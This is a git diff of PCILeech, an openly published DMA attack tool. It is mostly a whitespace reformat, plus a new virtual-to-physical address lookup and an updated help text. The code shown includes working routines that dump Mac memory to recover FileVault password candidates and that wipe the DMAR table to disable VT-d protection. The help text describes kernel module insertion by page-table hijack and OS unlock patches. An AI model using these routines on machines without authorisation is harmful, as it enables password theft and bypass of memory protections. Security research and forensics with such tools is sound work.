-			st.wHour,
-			st.wMinute,
-			st.wSecond);
-	}
+    SYSTEMTIME st;
+    if(pCfg->szFileOut[0] == 0) {
+        GetLocalTime(&st);
+        _snprintf_s(
+            pCfg->szFileOut,
+            MAX_PATH,
+            _TRUNCATE,
+            "pcileech-mac-fvrecover-%i%02i%02i-%02i%02i%02i.raw",
+            st.wYear,
+            st.wMonth,
+            st.wDay,
+            st.wHour,
+            st.wMinute,
+            st.wSecond);
+    }
 }
 
 VOID Action_MacFilevaultRecover(_Inout_ PPCILEECH_CONTEXT ctx, _In_ BOOL IsRebootRequired)
 {
-	FILE *pFile = NULL;
-	PBYTE pbBuffer512M;
-	// Allocate 512 MB buffer
-	if(!(pbBuffer512M = LocalAlloc(LMEM_ZEROINIT, 0x20000000))) {
-		printf("MAC_FVRECOVER: FAILED. Unable to allocate memory.\n");
-		return;
-	}
-	if(IsRebootRequired) {
-		// Wait for target computer reboot (device will power cycle).
-		printf(
-			"MAC_FVRECOVER: WAITING ... please reboot ...\n" \
-			"  Please force a reboot of the mac by pressing CTRL+CMD+POWER\n" \
-			"  WARNING! This will not work in macOS Sierra 10.12.2 and later.\n");
-		Util_WaitForPowerCycle(ctx);
-	} else {
-		// Wait for DMA read access to target computer.
-		printf("MAC_FVRECOVER: WAITING for DMA access ...\n");
-		Util_WaitForPowerOn(ctx);
-	}
-	// Try read 512M of memory from in the range: [0x70000000..0x90000000[.
-	printf("MAC_FVRECOVER: Continuing ...\n");
-	Extra_MacFVRecover_ReadMemory_Optimized(ctx, pbBuffer512M);
-	// Try write to disk image.
-	printf("MAC_FVRECOVER: Writing partial memory contents to file ...\n");
-	Extra_MacFVRecover_SetOutFileName(ctx->cfg);
-	if(!fopen_s(&pFile, ctx->cfg->szFileOut, "r") || pFile) {
-		printf("MAC_FVRECOVER: Error writing partial memory contents to file. File exists.\n");
-		fclose(pFile);
-		pFile = NULL;
-	} else if(fopen_s(&pFile, ctx->cfg->szFileOut, "wb") || !pFile) {
-		printf("MAC_FVRECOVER: Error writing partial memory contents to file.\n");
-		pFile = NULL;
-	}
-	else if(0x20000000 != fwrite(pbBuffer512M, 1, 0x20000000, pFile)) {
-		printf("MAC_FVRECOVER: Error writing partial memory contents to file.\n");
-	} else {
-		printf("MAC_FVRECOVER: File: %s.\n", ctx->cfg->szFileOut);
-	}
-	// Analyze for possible password candidates.
-	printf("MAC_FVRECOVER: Analyzing ...\n");
-	if(Extra_MacFVRecover_Analyze(pbBuffer512M)) {
-		printf("MAC_FVRECOVER: Completed.\n");
-	} else {
-		printf("MAC_FVRECOVER: Failed.\n");
-	}
-	// clean up.
-	LocalFree(pbBuffer512M);
-	if(pFile) { fclose(pFile); }
+    FILE *pFile = NULL;
+    PBYTE pbBuffer512M;
+    // Allocate 512 MB buffer
+    if(!(pbBuffer512M = LocalAlloc(LMEM_ZEROINIT, 0x20000000))) {
+        printf("MAC_FVRECOVER: FAILED. Unable to allocate memory.\n");
+        return;
+    }
+    if(IsRebootRequired) {
+        // Wait for target computer reboot (device will power cycle).
+        printf(
+            "MAC_FVRECOVER: WAITING ... please reboot ...\n" \
+            "  Please force a reboot of the mac by pressing CTRL+CMD+POWER\n" \
+            "  WARNING! This will not work in macOS Sierra 10.12.2 and later.\n");
+        Util_WaitForPowerCycle(ctx);
+    } else {
+        // Wait for DMA read access to target computer.
+        printf("MAC_FVRECOVER: WAITING for DMA access ...\n");
+        Util_WaitForPowerOn(ctx);
+    }
+    // Try read 512M of memory from in the range: [0x70000000..0x90000000[.
+    printf("MAC_FVRECOVER: Continuing ...\n");
+    Extra_MacFVRecover_ReadMemory_Optimized(ctx, pbBuffer512M);
+    // Try write to disk image.
+    printf("MAC_FVRECOVER: Writing partial memory contents to file ...\n");
+    Extra_MacFVRecover_SetOutFileName(ctx->cfg);
+    if(!fopen_s(&pFile, ctx->cfg->szFileOut, "r") || pFile) {
+        printf("MAC_FVRECOVER: Error writing partial memory contents to file. File exists.\n");
+        if(pFile) { fclose(pFile); }
+        pFile = NULL;
+    } else if(fopen_s(&pFile, ctx->cfg->szFileOut, "wb") || !pFile) {
+        printf("MAC_FVRECOVER: Error writing partial memory contents to file.\n");
+        pFile = NULL;
+    }
+    else if(0x20000000 != fwrite(pbBuffer512M, 1, 0x20000000, pFile)) {
+        printf("MAC_FVRECOVER: Error writing partial memory contents to file.\n");
+    } else {
+        printf("MAC_FVRECOVER: File: %s.\n", ctx->cfg->szFileOut);
+    }
+    // Analyze for possible password candidates.
+    printf("MAC_FVRECOVER: Analyzing ...\n");
+    if(Extra_MacFVRecover_Analyze(pbBuffer512M)) {
+        printf("MAC_FVRECOVER: Completed.\n");
+    } else {
+        printf("MAC_FVRECOVER: Failed.\n");
+    }
+    // clean up.
+    LocalFree(pbBuffer512M);
+    if(pFile) { fclose(pFile); }
 }
 
 VOID Action_MacDisableVtd(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	PBYTE pb16M;
-	BYTE ZERO16[16] = { 0 };
-	DWORD i, j, dwAddress, dwOffsets[] = {
-		0x8a000000, 0x8b000000, 0x8c000000, 0x8d000000, 0x89000000, 0x88000000, 0x87000000, 0x86000000
-	};
-	// Allocate 16 MB buffer
-	if(!(pb16M = LocalAlloc(LMEM_ZEROINIT, 0x01000000))) {
-		printf("MAC_DISABLE_VTD: FAILED. Unable to allocate memory.\n");
-		return;
-	}
-	// Wait for DMA read access to target computer.
-	printf("MAC_DISABLE_VTD: WAITING for DMA access ...\n");
-	Util_WaitForPowerOn(ctx);
-	// DMAR table assumed to be on page boundary. This doesn't have to be true,
-	// but it seems like it is on the MACs.
-	for(i = 0; i < sizeof(dwOffsets) / sizeof(DWORD); i++) {
-		if(DeviceReadDMAEx(ctx, dwOffsets[i], pb16M, 0x01000000, NULL, PCILEECH_FLAG_MEM_EX_FASTFAIL)) {
-			for(j = 0; j < 0x01000000; j += 0x1000) {
-				if(*(PQWORD)(pb16M + j) == 0x0000008852414d44) {
-					dwAddress = dwOffsets[i] + j;
-					if(DeviceWriteDMA(ctx, dwAddress, ZERO16, 16, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
-						printf("MAC_DISABLE_VTD: VT-d DMA protections should now be disabled ...\n");
-						printf("MAC_DISABLE_VTD: DMAR ACPI table found and removed at: 0x%08x\n", dwAddress);
-						LocalFree(pb16M);
-						return;
-					}
-				}
-			}
-		}
-	}
-	LocalFree(pb16M);
-	printf("MAC_DISABLE_VTD: Failed to disable VT-d DMA protections.\n");
+    PBYTE pb16M;
+    BYTE ZERO16[16] = { 0 };
+    DWORD i, j, dwAddress, dwOffsets[] = {
+        0x8a000000, 0x8b000000, 0x8c000000, 0x8d000000, 0x89000000, 0x88000000, 0x87000000, 0x86000000
+    };
+    // Allocate 16 MB buffer
+    if(!(pb16M = LocalAlloc(LMEM_ZEROINIT, 0x01000000))) {
+        printf("MAC_DISABLE_VTD: FAILED. Unable to allocate memory.\n");
+        return;
+    }
+    // Wait for DMA read access to target computer.
+    printf("MAC_DISABLE_VTD: WAITING for DMA access ...\n");
+    Util_WaitForPowerOn(ctx);
+    // DMAR table assumed to be on page boundary. This doesn't have to be true,
+    // but it seems like it is on the MACs.
+    for(i = 0; i < sizeof(dwOffsets) / sizeof(DWORD); i++) {
+        if(DeviceReadDMAEx(ctx, dwOffsets[i], pb16M, 0x01000000, NULL, PCILEECH_FLAG_MEM_EX_FASTFAIL)) {
+            for(j = 0; j < 0x01000000; j += 0x1000) {
+                if(*(PQWORD)(pb16M + j) == 0x0000008852414d44) {
+                    dwAddress = dwOffsets[i] + j;
+                    if(DeviceWriteDMA(ctx, dwAddress, ZERO16, 16, PCILEECH_MEM_FLAG_RETRYONFAIL)) {
+                        printf("MAC_DISABLE_VTD: VT-d DMA protections should now be disabled ...\n");
+                        printf("MAC_DISABLE_VTD: DMAR ACPI table found and removed at: 0x%08x\n", dwAddress);
+                        LocalFree(pb16M);
+                        return;
+                    }
+                }
+            }
+        }
+    }
+    LocalFree(pb16M);
+    printf("MAC_DISABLE_VTD: Failed to disable VT-d DMA protections.\n");
 }
 
 VOID Action_PT_Phys2Virt(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	BOOL result;
-	QWORD qwVA, qwPTE, qwPDE, qwPDPTE, qwPML4E;
-	printf("PT_PHYS2VIRT: searching ... (this may take some time).\n");
-	result = Util_PageTable_FindMappedAddress(ctx, ctx->cfg->qwCR3, ctx->cfg->qwDataIn[0], &qwVA, &qwPTE, &qwPDE, &qwPDPTE, &qwPML4E);
-	if(result) {
-		printf("PT_PHYS2VIRT: finished.\n");
-		printf("          0x00000000FFFFFFFF\n");
-		printf("   PA:    0x%016llx\n", ctx->cfg->qwDataIn[0]);
-		printf("   VA:    0x%016llx\n", qwVA);
-		printf("   PTE:   0x%016llx\n", qwPTE);
-		printf("   PDE:   0x%016llx\n", qwPDE);
-		printf("   PDPTE: 0x%016llx\n", qwPDPTE);
-		printf("   PML4E: 0x%016llx\n", qwPML4E);
-	} else {
-		printf("PT_PHYS2VIRT: Failed.\n");
-	}
+    BOOL result;
+    QWORD qwVA, qwPTE, qwPDE, qwPDPTE, qwPML4E;
+    printf("PT_PHYS2VIRT: searching ... (this may take some time).\n");
+    result = Util_PageTable_FindMappedAddress(ctx, ctx->cfg->qwCR3, ctx->cfg->qwDataIn[0], &qwVA, &qwPTE, &qwPDE, &qwPDPTE, &qwPML4E);
+    if(result) {
+        printf("PT_PHYS2VIRT: finished.\n");
+        printf("          0x00000000FFFFFFFF\n");
+        printf("   PA:    0x%016llx\n", ctx->cfg->qwDataIn[0]);
+        printf("   VA:    0x%016llx\n", qwVA);
+        printf("   PTE:   0x%016llx\n", qwPTE);
+        printf("   PDE:   0x%016llx\n", qwPDE);
+        printf("   PDPTE: 0x%016llx\n", qwPDPTE);
+        printf("   PML4E: 0x%016llx\n", qwPML4E);
+    } else {
+        printf("PT_PHYS2VIRT: Failed.\n");
+    }
+}
+
+VOID Action_PT_Virt2Phys(_Inout_ PPCILEECH_CONTEXT ctx)
+{
+    BOOL result;
+    QWORD qwPA, qwPageBase, qwPageSize;
+    result = Util_PageTable_Virtual2Physical(ctx, ctx->cfg->qwCR3, ctx->cfg->qwDataIn[0], &qwPA, &qwPageBase, &qwPageSize);
+    if(result) {
+        printf("PT_VIRT2PHYS: Successful.\n");
+        printf("               0x00000000FFFFFFFF\n");
+        printf("   VA:         0x%016llx\n", ctx->cfg->qwDataIn[0]);
+        printf("   PA:         0x%016llx\n", qwPA);
+        printf("   PG SIZE:    0x%016llx\n", qwPageSize);
+        printf("   PG BASE PA: 0x%016llx\n", qwPageBase);
+        printf("   CR3/PML4:   0x%016llx\n", ctx->cfg->qwCR3);
+    } else {
+        printf("PT_VIRT2PHYS: Failed.\n");
+    }
 }
 
 VOID Action_TlpTx(_Inout_ PPCILEECH_CONTEXT ctx)
 {
-	if(ctx->cfg->cbIn < 12) {
-		printf("Action_TlpTx: Invalid TLP (too short).\n");
-		return;
-	}
-	if(ctx->cfg->cbIn % 4) {
-		printf("Action_TlpTx: Invalid TLP (length not multiple of 4).\n");
-		return;
-	}
-	printf("TLP: Transmitting PCIe TLP.%s\n", ctx->cfg->fVerboseExtra ? "" : " (use -vv option for detailed info).");
-	DeviceWriteTlp(ctx, ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn);
-	DeviceListenTlp(ctx, 100);
+    if(ctx->cfg->cbIn < 12) {
+        printf("Action_TlpTx: Invalid TLP (too short).\n");
+        return;
+    }
+    if(ctx->cfg->cbIn % 4) {
+        printf("Action_TlpTx: Invalid TLP (length not multiple of 4).\n");
+        return;
+    }
+    printf("TLP: Transmitting PCIe TLP.%s\n", ctx->cfg->fVerboseExtra ? "" : " (use -vv option for detailed info).");
+    DeviceWriteTlp(ctx, ctx->cfg->pbIn, (DWORD)ctx->cfg->cbIn);
+    DeviceListenTlp(ctx, 100);
 }
diff --git a/pcileech/extra.h b/pcileech/extra.h
index b5b319c..b165123 100644
--- a/pcileech/extra.h
+++ b/pcileech/extra.h
@@ -1,6 +1,6 @@
 // extra.h : definitions related to various extra functionality such as exploits.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #ifndef __EXTRA_H__
@@ -33,6 +33,12 @@ VOID Action_MacDisableVtd(_Inout_ PPCILEECH_CONTEXT ctx);
 */
 VOID Action_PT_Phys2Virt(_Inout_ PPCILEECH_CONTEXT ctx);
 
+/*
+* Search for the physical address that is mapped by a virtual address given a page table base.
+* -- ctx
+*/
+VOID Action_PT_Virt2Phys(_Inout_ PPCILEECH_CONTEXT ctx);
+
 /*
 * Transmit the TLP data specified in the -in parameter.
 * -- ctx
diff --git a/pcileech/help.c b/pcileech/help.c
index 8ef57d0..5110c74 100644
--- a/pcileech/help.c
+++ b/pcileech/help.c
@@ -1,6 +1,6 @@
 // help.c : implementation related to displaying help texts.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include "help.h"
@@ -8,504 +8,546 @@
 
 VOID ShowListFiles(_In_ LPSTR szSearchPattern)
 {
-	WIN32_FIND_DATAA data;
-	HANDLE h;
-	CHAR szSearch[MAX_PATH];
-	Util_GetFileInDirectory(szSearch, szSearchPattern);
-	h = FindFirstFileA(szSearch, &data);
-	while(h != INVALID_HANDLE_VALUE) {
-		data.cFileName[strlen(data.cFileName) - 4] = 0;
-		printf("             %s\n", data.cFileName);
-		if(!FindNextFileA(h, &data)) {
-			return;
-		}
-	}
+    WIN32_FIND_DATAA data;
+    HANDLE h;
+    CHAR szSearch[MAX_PATH];
+    Util_GetFileInDirectory(szSearch, szSearchPattern);
+    h = FindFirstFileA(szSearch, &data);
+    while(h != INVALID_HANDLE_VALUE) {
+        data.cFileName[strlen(data.cFileName) - 4] = 0;
+        printf("             %s\n", data.cFileName);
+        if(!FindNextFileA(h, &data)) {
+            return;
+        }
+    }
 }
 
 VOID Help_ShowGeneral()
 {
-	printf(
-		" PCILEECH COMMAND LINE REFERENCE                                               \n" \
-		" PCILeech can run in two modes - DMA (default) and Kernel Module Assisted (KMD)\n" \
-		" KMD mode may be triggered by supplying the option kmd and optionally cr3 / pt.\n" \
-		" If an address is supplied in the kmd option pcileech will use the already ins-\n" \
-		" erted KMD. The already inserted KMD will be left intact upon exit.  If the KMD\n" \
-		" contains a kernel mode signature the kernel module will be loaded and then un-\n" \
-		" loaded on program exit ( except for the kmdload command ).                    \n" \
-		" KMD mode may access all memory (available to the kernel of the target system).\n" \
-		" DMA mode may only access lower 4GB of memory if USB3380 hardware is used.     \n" \
-		" DMA mode may access all memory if FPGA based hardware is used such as the:    \n" \
-		" SP605, AC701 and PCIeScreamer.                                                \n" \
-		" For detailed help about a specific command type:  pcileech.exe <command> -help\n" \
-		" General syntax: pcileech.exe <command> [-<optionname1> <optionvalue1>] ...    \n" \
-		" Valid commands and valid MODEs     [ and options ]                            \n" \
-		"   info                   DMA,KMD                                              \n" \
-		"   dump                   DMA,KMD   [ min, max, out ]                          \n" \
-		"   patch                  DMA,KMD   [ min, max, sig, all ]                     \n" \
-		"   write                  DMA,KMD   [ min, in ]                                \n" \
-		"   search                 DMA,KMD   [ min, max, sig, in, all ]                 \n" \
-		"   [implant]                  KMD   [ in, out, s, 0..9 ]                       \n" \
-		"   kmdload                DMA       [ pt, cr3 ]                                \n" \
-		"   kmdexit                    KMD                                              \n" \
-		"   mount                      KMD   [ s ]          (Windows only feature)      \n" \
-		"   display                DMA,KMD   [ min, max ]                               \n" \
-		"   pagedisplay            DMA,KMD   [ min ]                                    \n" \
-		"   pt_phys2virt           DMA,KMD   [ cr3, 0 ]                                 \n" \
-		"   testmemread            DMA       [ min ]                                    \n" \
-		"   testmemreadwrite       DMA       [ min ]                                    \n" \
-		" Device specific commands and valid MODEs [ and options ] (and device):        \n" \
-		"   usb3380_flash          DMA,KMD   [ in ]         (USB3380)                   \n" \
-		"   usb3380_8051start      DMA,KMD   [ in ]         (USB3380)                   \n" \
-		"   usb3380_8051stop       DMA,KMD                  (USB3380)                   \n" \
-		"   tlp                    DMA       [ in ]         (FPGA)                      \n" \
-		"   probe                  DMA       [ in ]         (FPGA)                      \n" \
-		" System specific commands and valid MODEs [ and options ]:                     \n" \
-		"   mac_fvrecover          DMA                                                  \n" \
-		"   mac_fvrecover2         DMA                                                  \n" \
-		"   mac_disablevtd         DMA                                                  \n" \
-		" Valid options:                                                                \n" \
-		"   -min : memory min address, valid range: 0x0 .. 0xffffffffffffffff           \n" \
-		"          default: 0x0                                                         \n" \
-		"   -max : memory max address, valid range: 0x0 .. 0xffffffffffffffff           \n" \
-		"          default: <max supported by device> (FPGA = no limit, USB3380 = 4GB)  \n" \
-		"   -out : name of output file.                                                 \n" \
-		"          default: pcileech-<minaddr>-<maxaddr>-<date>-<time>.raw              \n" \
-		"          No output file will be created if parameter is set to none or null.  \n" \
-		"   -all : search all memory for signature - do not stop at first occurrence.   \n" \
-		"          Option has no value. Example: -all                                   \n" \
-		"   -vv  : extra verbose option. Same as -v but even more detailed output.      \n" \
-		"          Option shows raw PCIe TLPs received/sent if FPGA is used.            \n" \
-		"   -v   : verbose option. Additional information is displayed in the output.   \n" \
-		"          Affects all modes and commands. Option has no value. Example: -v     \n" \
-		"   -force: force reads and writes even though target memory is marked as not   \n" \
-		"          accessible. Dangerous! Affects all modes and commands.               \n" \
-		"          Option has no value. Example: -force                                 \n" \
-		"   -usb2: force USB2 mode (only for USB3380 device). USB2 will reduce transfer \n" \
-		"          speed but increase stability. Option has no value. Example: -usb2    \n" \
-		"   -pcie_gen1: force PCIe Gen1 mode. For FPGA devices capable of PCIe Gen2.    \n" \
-		"          May increase stability. Option has no value. Example: -pcie_gen1     \n" \
-		"   -iosize: max DMA i/o size. Hardware DMA requests larger than iosize will    \n" \
-		"          be discarded. Affects all modes and commands.                        \n" \
-		"   -tlpwait: Wait in seconds while listening for PCIe TLPs.                    \n" \
-		"          Wait occurs after any other actions have been completed.             \n" \
-		"   -device: force the use of a specific hardware device instead of auto-detect.\n" \
-		"          Affects all modes and commands.                                      \n" \
-		"          Valid options: USB3380, FPGA, SP605_TCP                              \n" \
-		"   -device-addr: Remote address for -device SP605_TCP.                         \n" \
-		"   -device-port: Remote TCP port for -device SP605_TCP. Default value: 28472.  \n" \
-		"   -device-opt[0-3]: Optional additional device configuration for some devices.\n" \
-		"          FPGA device (NB! 0 = default!): -device-opt0 = delay read uS         \n" \
-		"                -device-opt1 = delay write uS, -device-opt2 = delay probe uS   \n" \
-		"   -help: show help about the selected command or implant and then exit        \n" \
-		"          without running the command. Affects all modes and commands.         \n" \
-		"          Option has no value. Example: -help                                  \n" \
-		"   -in  : file name or hexstring to load as input.                             \n" \
-		"          Examples: -in 0102030405060708090a0b0c0d0e0f or -in firmware.bin     \n" \
-		"   -s   : string input value.                                                  \n" \
-		"          Example: -s \"\\\\??\\C:\\Windows\\System32\\cmd.exe\"               \n" \
-		"   -0..9: QWORD input value. Example: -0 0xff , -3 0x7fffffff00001000 or -2 13 \n" \
-		"          default: 0                                                           \n" \
-		"   -pt  : trigger KMD insertion by automatic page table hijack.                \n" \
-		"          Option has no value. Example: -pt                                    \n" \
-		"          Used in conjunction with -kmd option to trigger KMD insertion by page\n" \
-		"          table hijack. Only recommended to use with care on computers with    \n" \
-		"          4GB+ RAM when kernel is located in high-memory (Windows 10).         \n" \
-		"   -cr3 : base address of system page table / CR3 CPU register.                \n" \
-		"   -efibase : base address of EFI_SYSTEM_TABLE (IBI SYST) used when inserting  \n" \
-		"          UEFI 'kernel' modules.                                               \n" \
-		"   -kmd : address of already loaded kernel module helper (KMD).                \n" \
-		"          ALTERNATIVELY                                                        \n" \
-		"          kernel module to use, see list below for choices:                    \n" \
-		"             WIN10_X64                                                         \n" \
-		"             LINUX_X64_46            (NB! Kernels 2.6.33 - 4.6)                \n" \
-		"             LINUX_X64_48            (NB! Kernels 4.8+, 64-bit DMA recommended)\n" \
-		"             LINUX_X64_EFI           (NB! UEFI booted systems only)            \n" \
-		"             FREEBSD_X64                                                       \n" \
-		"             MACOS                                                             \n" \
-		"             UEFI_EXIT_BOOT_SERVICES                                           \n" \
-		"             UEFI_SIGNAL_EVENT                                                 \n" \
-	);
-	ShowListFiles("*.kmd");
-	printf(
-		"   -sig : available patches - including operating system unlock patches:       \n");
-	ShowListFiles("*.sig");
-	printf(
-		" Available implants:                                                           \n");
-	ShowListFiles("*.ksh");
-	printf("\n");
+    printf(
+        " PCILEECH COMMAND LINE REFERENCE                                               \n" \
+        " PCILeech can run in two modes - DMA (default) and Kernel Module Assisted (KMD)\n" \
+        " KMD mode may be triggered by supplying the option kmd and optionally cr3 / pt.\n" \
+        " If an address is supplied in the kmd option pcileech will use the already ins-\n" \
+        " erted KMD. The already inserted KMD will be left intact upon exit.  If the KMD\n" \
+        " contains a kernel mode signature the kernel module will be loaded and then un-\n" \
+        " loaded on program exit ( except for the kmdload command ).                    \n" \
+        " KMD mode may access all memory (available to the kernel of the target system).\n" \
+        " DMA mode may only access lower 4GB of memory if USB3380 hardware is used.     \n" \
+        " DMA mode may access all memory if FPGA based hardware is used such as the:    \n" \
+        " SP605, AC701 and PCIeScreamer.                                                \n" \
+        " For detailed help about a specific command type:  pcileech <command> -help    \n" \
+        " General syntax: pcileech <command> [-<optionname1> <optionvalue1>] ...        \n" \
+        " Valid commands and valid MODEs     [ and options ]                            \n" \
+        "   info                   DMA,KMD                                              \n" \
+        "   dump                   DMA,KMD   [ min, max, out ]                          \n" \
+        "   patch                  DMA,KMD   [ min, max, sig, all ]                     \n" \
+        "   write                  DMA,KMD   [ min, in ]                                \n" \
+        "   search                 DMA,KMD   [ min, max, sig, in, all ]                 \n" \
+        "   [implant]                  KMD   [ in, out, s, 0..9 ]                       \n" \
+        "   kmdload                DMA       [ pt, cr3 ]                                \n" \
+        "   kmdexit                    KMD                                              \n" \
+        "   mount                      KMD   [ s, cr3 ]     (Windows only feature)      \n" \
+        "   display                DMA,KMD   [ min, max ]                               \n" \
+        "   pagedisplay            DMA,KMD   [ min ]                                    \n" \
+        "   pt_phys2virt           DMA,KMD   [ cr3, 0 ]                                 \n" \
+        "   pt_virt2phys           DMA,KMD   [ cr3, 0 ]                                 \n" \
+        "   testmemread            DMA       [ min ]                                    \n" \
+        "   testmemreadwrite       DMA       [ min ]                                    \n" \
+        "   vmm_identify           DMA                                                  \n" \
+        " Device specific commands and valid MODEs [ and options ] (and device):        \n" \
+        "   usb3380_flash          DMA,KMD   [ in ]         (USB3380)                   \n" \
+        "   usb3380_8051start      DMA,KMD   [ in ]         (USB3380)                   \n" \
+        "   usb3380_8051stop       DMA,KMD                  (USB3380)                   \n" \
+        "   tlp                    DMA       [ in ]         (FPGA)                      \n" \
+        "   probe                  DMA       [ in ]         (FPGA)                      \n" \
+        " System specific commands and valid MODEs [ and options ]:                     \n" \
+        "   mac_fvrecover          DMA                                                  \n" \
+        "   mac_fvrecover2         DMA                                                  \n" \
+        "   mac_disablevtd         DMA                                                  \n" \
+        " Valid options:                                                                \n" \
+        "   -min : memory min address, valid range: 0x0 .. 0xffffffffffffffff           \n" \
+        "          default: 0x0                                                         \n" \
+        "   -max : memory max address, valid range: 0x0 .. 0xffffffffffffffff           \n" \
+        "          default: <max supported by device> (FPGA = no limit, USB3380 = 4GB)  \n" \
+        "   -out : name of output file.                                                 \n" \
+        "          default: pcileech-<minaddr>-<maxaddr>-<date>-<time>.raw              \n" \
+        "          No output file will be created if parameter is set to none or null.  \n" \
+        "   -all : search all memory for signature - do not stop at first occurrence.   \n" \
+        "          Option has no value. Example: -all                                   \n" \
+        "   -v   : verbose option. Additional information is displayed in the output.   \n" \
+        "          Affects all modes and commands. Option has no value. Example: -v     \n" \
+        "   -vv  : extra verbose option. More detailed additional information is shown  \n" \
+        "          in output. Option has no value. Example: -vv                         \n" \
+        "   -vvv : super verbose option. Show all data transferred such as PCIe TLPs.   \n" \
+        "          Option has no value. Example: -vvv                                   \n" \
+        "   -force: force reads and writes even though target memory is marked as not   \n" \
+        "          accessible. Dangerous! Affects all modes and commands.               \n" \
+        "          Option has no value. Example: -force                                 \n" \
+        "   -usb2: force USB2 mode (only for USB3380 device). USB2 will reduce transfer \n" \
+        "          speed but increase stability. Option has no value. Example: -usb2    \n" \
+        "   -pcie_gen1: force PCIe Gen1 mode. For FPGA devices capable of PCIe Gen2.    \n" \
+        "          May increase stability. Option has no value. Example: -pcie_gen1     \n" \
+        "   -iosize: max DMA i/o size. Hardware DMA requests larger than iosize will    \n" \
+        "          be discarded. Affects all modes and commands.                        \n" \
+        "   -tlpwait: Wait in seconds while listening for PCIe TLPs.                    \n" \
+        "          Wait occurs after any other actions have been completed.             \n" \
+        "   -device: force the use of a specific hardware device instead of auto-detect.\n" \
+        "          Affects all modes and commands.                                      \n" \
+        "          Valid options: USB3380, FPGA, SP605_TCP, <memory-dump-file-name>     \n" \
+        "   -device-addr: Remote address for -device SP605_TCP.                         \n" \
+        "   -device-port: Remote TCP port for -device SP605_TCP. Default value: 28472.  \n" \
+        "   -device-opt[0-3]: Optional additional device configuration for some devices.\n" \
+        "          FPGA device (NB! 0 = default!): -device-opt0 = delay read uS         \n" \
+        "                -device-opt1 = delay write uS, -device-opt2 = delay probe uS   \n" \
+        "   -help: show help about the selected command or implant and then exit        \n" \
+        "          without running the command. Affects all modes and commands.         \n" \
+        "          Option has no value. Example: -help                                  \n" \
+        "   -in  : file name or hexstring to load as input.                             \n" \
+        "          Examples: -in 0102030405060708090a0b0c0d0e0f or -in firmware.bin     \n" \
+        "   -s   : string input value.                                                  \n" \
+        "          Example: -s \"\\\\??\\C:\\Windows\\System32\\cmd.exe\"               \n" \
+        "   -0..9: QWORD input value. Example: -0 0xff , -3 0x7fffffff00001000 or -2 13 \n" \
+        "          default: 0                                                           \n" \
+        "   -pt  : trigger KMD insertion by automatic page table hijack.                \n" \
+        "          Option has no value. Example: -pt                                    \n" \
+        "          Used in conjunction with -kmd option to trigger KMD insertion by page\n" \
+        "          table hijack. Only recommended to use with care on computers with    \n" \
+        "          4GB+ RAM when kernel is located in high-memory (Windows 10).         \n" \
+        "   -cr3 : base address of system page table / CR3 CPU register.                \n" \
+        "   -efibase : base address of EFI_SYSTEM_TABLE (IBI SYST) used when inserting  \n" \
+        "          UEFI 'kernel' modules.                                               \n" \
+        "   -kmd : address of already loaded kernel module helper (KMD).                \n" \
+        "          ALTERNATIVELY                                                        \n" \
+        "          kernel module to use, see list below for choices:                    \n" \
+        "             WIN10_X64                                                         \n" \
+        "             LINUX_X64_46            (NB! Kernels 2.6.33 - 4.6)                \n" \
+        "             LINUX_X64_48            (NB! Kernels 4.8+, 64-bit DMA recommended)\n" \
+        "             LINUX_X64_EFI           (NB! UEFI booted systems only)            \n" \
+        "             FREEBSD_X64                                                       \n" \
+        "             MACOS                                                             \n" \
+        "             UEFI_EXIT_BOOT_SERVICES                                           \n" \
+        "             UEFI_SIGNAL_EVENT                                                 \n" \
+    );
+    ShowListFiles("*.kmd");
+    printf(
+        "   -sig : available patches - including operating system unlock patches:       \n");
+    ShowListFiles("*.sig");
+    printf(
+        " Available implants:                                                           \n");
+    ShowListFiles("*.ksh");
+    printf("\n");
 }
 
 VOID Help_ShowInfo()
 {
-	printf(
-		" PCILEECH INFORMATION                                                          \n" \
-		" PCILeech (c) 2016-2018 Ulf Frisk                                              \n" \
-		" Version: 2.6                                                                  \n" \
-		" License: GNU GENERAL PUBLIC LICENSE - Version 3, 29 June 2007                 \n" \
-		" Contact information: pcileech@frizk.net                                       \n" \
-		" System requirements: 64-bit Windows 7, 10 or Linux.                           \n" \
-		" Other project references:                                                     \n" \
-		"   PCILeech          - https://github.com/ufrisk/pcileech                      \n" \
-		"   PCILeech-FPGA     - https://github.com/ufrisk/pcileech-fpga                 \n" \
-		"   Google USB Driver - https://developer.android.com/sdk/win-usb.html          \n" \
-		"   FTDI FT601 Driver - http://www.ftdichip.com/Drivers/D3XX.htm                \n" \
-		"   Dokany            - https://github.com/dokan-dev/dokany/releases/latest     \n" \
-		" ----------------                                                              \n" \
-		" Use with USB3380 hardware programmed as a PCILeech device.                    \n" \
-		" Use with FPGA harware programmed as a PCILeech FPGA device.                   \n" \
-		" Use with SP605 hardware / 'PCI Express DIY hacking toolkit' by cr4sh/@d_olex. \n\n" \
-		" ----------------                                                              \n" \
-		" Driver information (USB3380/Windows):                                         \n" \
-		"   The USB3380 HW requires a dummy driver to function properly. The PCILeech   \n" \
-		"   device masks as a Google Glass. Please download and install the Google USB  \n" \
-		"   driver before proceeding by using the USB3380 device. USB3 is recommended   \n" \
-		"   to performance reasons (USB2 will work but impact performance).             \n" \
-		" Driver information (FPGA/FT601/Windows):                                      \n" \
-		"   The PCILeech programmed FPGA board with FT601 USB3 requires drivers for USB.\n" \
-		"   The drivers are on Windows update and is installed at first use.            \n" \
-		"   PCILeech also requires the FTDI application library (DLL). Download DLL from\n" \
-		"   FTDI web site and place the 64-bit FTD3XX.dll alongside pcileech.exe.       \n" \
-		" Driver information (Dokany/Windows):                                          \n" \
-		"   To be able to use the 'mount' functionality for filesystem browsing and live\n" \
-		"   memory file access PCILeech requires Dokany to be installed for virtual file\n" \
-		"   system support. Please download and install Dokany on your computer before  \n" \
-		"   using the mount functionality.                                              \n" \
-		" Driver information (Libusb/Linux):                                            \n" \
-		"   PCILeech on Linux requires that libusb is installed. Libusb is most probably\n" \
-		"   installed by default, if not install by running:apt-get install libusb-1.0-0\n" \
-		" ----------------                                                              \n" \
-		" Notes about the PCILeech USB3380 device:                                      \n" \
